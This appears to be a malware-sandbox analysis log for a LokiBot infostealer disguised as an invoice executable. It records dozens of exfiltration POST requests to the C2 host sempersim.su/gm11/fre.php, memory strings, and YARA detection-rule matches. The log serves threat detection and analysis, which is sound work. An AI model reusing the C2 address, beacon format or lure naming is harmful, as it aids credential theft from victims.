            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 163Connection: close
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: INV.2022LB0362 FORM CO (2).exe, 00000003.00000002.506023871.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://sempersim.su/gm11/fre.php
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, INV.2022LB0362 FORM CO (2).exe, 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: unknownHTTP traffic detected: POST /gm11/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B40C7D1CContent-Length: 190Connection: close
            Source: unknownDNS traffic detected: queries for: sempersim.su

            System Summary

            barindex
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.255040267.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6132, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: INV.2022LB0362 FORM CO (2).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
